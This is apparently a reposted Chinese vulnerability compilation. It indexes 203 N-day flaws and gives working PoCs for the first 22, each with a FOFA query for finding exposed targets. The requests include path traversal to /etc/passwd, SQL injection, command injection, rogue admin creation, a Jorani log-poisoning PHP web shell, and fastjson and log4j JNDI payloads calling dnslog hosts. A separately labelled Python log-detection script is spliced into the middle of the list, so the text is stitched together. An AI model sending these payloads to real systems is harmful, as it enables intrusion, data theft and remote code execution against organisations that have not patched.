Compilation of Publicly Disclosed Internet Vulnerabilities, 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is sourced from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attack activity in offensive and defensive exercises, and we hope this article helps with defense. Defenders can use its contents to triage risk across their own assets.

Vulnerability sources: this article covers 203 PoCs for high-impact vulnerabilities published in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites and compiled for publication by the 网络安全新视界 team.

Security patches: every vulnerability listed is already public; contact the product vendor for patches or remediation guidance.

Content: because of length limits, a few overly long PoCs are replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the material removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the complete version; when using it, open the browser tools (F12) and search the page for keywords.

Bookmark this article if you find it useful, and feel free to follow this public account (网络安全新视界).

Table of Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. DocCMS (稻壳CMS) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality testing system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立讯 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 福建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC List

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Replace password with the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then send the following (the command is injected through the wifiRebootrange field):
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login step>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

PAYLOAD is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

The response to the upload contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain a session and CSRF cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST to the login endpoint. The language parameter traverses to application/logs so that the login value, a PHP stub that runs the base64-decoded content of the K1SYJPMHLU4Z request header, is written into the application's log file.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: send the following request to the target to execute the id command. The header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64 encoding of the command (an id 2>&1 wrapped in echo markers); the request renders the poisoned log file, which executes the stub.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a database function to compute the MD5 of 1234; the hash in the response confirms injection.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

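The request-line indicators in entries 1 to 16 are what a defender would turn into detection rules, and several of them only match after the target is decoded and normalized: the DocCMS payload in entry 9 is double URL-encoded, and entries 14 and 15 reach getAllList through a `;.ico` path parameter and an `a.ico/../` dot segment. The following Python script is an added example, not code from the article or from any vendor listed on it. It parses constructed access-log lines (the client addresses, timestamps and status codes are made up; the request lines are the PoCs above), normalizes each target the way a matcher should, and reports which PoC pattern a line matches. Rule coverage is deliberately limited to what the page shows.

```python
import posixpath
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, quote, unquote, unquote_plus


def decode_fully(s: str, rounds: int = 3, fn=unquote) -> str:
    """Percent-decode until the value stops changing (bounded), so that a
    double-encoded payload such as the DocCMS one is matched in clear text."""
    for _ in range(rounds):
        nxt = fn(s)
        if nxt == s:
            break
        s = nxt
    return s


@dataclass
class Req:
    method: str
    raw_target: str
    path: str                 # decoded, ';param' stripped per segment, dot segments collapsed
    query: str                # fully decoded query string
    params: dict = field(default_factory=dict)
    traversal: bool = False   # a '..' segment was present before collapsing


def parse_request(method: str, target: str) -> Req:
    raw_path, _, raw_query = target.partition("?")
    # Drop per-segment parameters (';.ico', ';stok=...') after decoding: Spring-style
    # matchers ignore them, which is what the jshERP request in entry 14 relies on.
    segments = [seg.split(";", 1)[0] for seg in decode_fully(raw_path).split("/")]
    path = posixpath.normpath("/" + "/".join(segments).lstrip("/"))
    params = {k: decode_fully(v, fn=unquote_plus)
              for k, v in parse_qsl(raw_query, keep_blank_values=True)}
    return Req(method, target, path, decode_fully(raw_query, fn=unquote_plus),
               params, ".." in segments)


# Error-based and time-based markers: entries 9, 11 and 16 use the first three,
# later entries on the page use the delay functions.
SQLI_MARKER = re.compile(
    r"(?i)(extractvalue|updatexml|hashbytes)\s*\(|waitfor\s+delay|"
    r"dbms_pipe\.receive_message|@@version"
)

# (description, predicate) pairs derived from the PoCs in entries 1 to 16.
RULES = [
    ("StarRocks /mem_tracker unauthenticated access (entry 1)",
     lambda r: r.path == "/mem_tracker"),
    ("path traversal in request path (entries 2, 15)", lambda r: r.traversal),
    ("EasyCVR userlist disclosure (entry 3)", lambda r: r.path == "/api/v1/userlist"),
    ("EasyCVR adduser (entry 4)",
     lambda r: r.method == "POST" and r.path == "/api/v1/adduser"),
    ("NUUO NVR __debugging_center_utils___.php (entry 5)",
     lambda r: r.path.endswith("/__debugging_center_utils___.php")),
    ("Sangfor NGAF loadfile.php with file= (entry 6)",
     lambda r: r.path.endswith("/svpn_html/loadfile.php") and "file" in r.params),
    ("808gps MobileAction_downLoad.action (entry 7)",
     lambda r: r.path.endswith("/808gps/MobileAction_downLoad.action")),
    ("Phicomm luci wifireboot, post-auth (entry 8)",
     lambda r: r.path == "/cgi-bin/luci/admin/wifireboot"),
    ("Landray EIS api.aspx?action=saveImg upload (entry 10)",
     lambda r: r.path.endswith("/eis/service/api.aspx")
     and r.params.get("action") == "saveImg"),
    ("iOffice ioFileDown.aspx file read (entry 13)",
     lambda r: r.path.endswith("/ioffice/prg/interface/ioFileDown.aspx")),
    ("jshERP getAllList disclosure (entries 14, 15)",
     lambda r: r.path.endswith("/user/getAllList")),
    ("SQL injection marker in query string (entries 9, 11, 16)",
     lambda r: bool(SQLI_MARKER.search(r.query))),
]

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_line(line: str) -> list[str]:
    """Return the descriptions of every rule a common-log-format line matches."""
    m = LOG_RE.search(line)
    if not m:
        return []
    req = parse_request(m["method"], m["target"])
    return [desc for desc, hit in RULES if hit(req)]


def scan_log(lines) -> dict[int, list[str]]:
    """Map line index -> matched rules, for lines that matched at least one."""
    hits = {}
    for i, line in enumerate(lines):
        if matched := scan_line(line):
            hits[i] = matched
    return hits


# Constructed sample log (made-up hosts, times and sizes); the request lines are
# the PoCs above, with the DocCMS payload encoded twice as entry 9 specifies.
DOCCMS_PAYLOAD = "' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#"
DOCCMS_ENCODED = quote(quote(DOCCMS_PAYLOAD, safe=""), safe="")
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2024:10:00:00 +0800] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jun/2024:10:00:01 +0800] "GET /static/../../../../../../etc/passwd HTTP/1.1" 200 1420',
    '10.0.0.7 - - [01/Jun/2024:10:00:02 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 8801',
    '10.0.0.7 - - [01/Jun/2024:10:00:03 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTT' 'P/1.1" 200 8801',
    f'10.0.0.8 - - [01/Jun/2024:10:00:04 +0800] "GET /search/index.php?keyword={DOCCMS_ENCODED} HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jun/2024:10:00:05 +0800] "POST /api/v1/adduser HTTP/1.1" 200 40',
    '10.0.0.9 - - [01/Jun/2024:10:00:06 +0800] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 1420',
    '10.0.0.10 - - [01/Jun/2024:10:00:07 +0800] "GET /dossier/doc_fileedit_word.aspx?recordid=1%27%20and%201=@@version--+&edittype=1,1 HTTP/1.1" 500 0',
    '10.0.0.11 - - [01/Jun/2024:10:00:08 +0800] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 60',
]

if __name__ == "__main__":
    for idx, matched in scan_log(SAMPLE_LOG).items():
        print(idx, SAMPLE_LOG[idx].split('"')[1], "->", "; ".join(matched))
```

To run it against a real log, feed the file's lines to scan_log. The endpoint rules are specific enough to alert on directly; the traversal rule fires on any `..` segment and the SQL marker rule on function names, so on a busy site both need tuning, but they are what catches variants the page does not list (the jshERP request in entry 15 trips both the traversal rule and the endpoint rule, which is the expected behaviour).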
17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
 <netMarkings>
 (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
 </netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
 "a":{
 "@type":"com.alibaba.fastjson.JSONObject",
 {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
 }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
 "loginName":"${jndi:ldap://dnslog}"
}

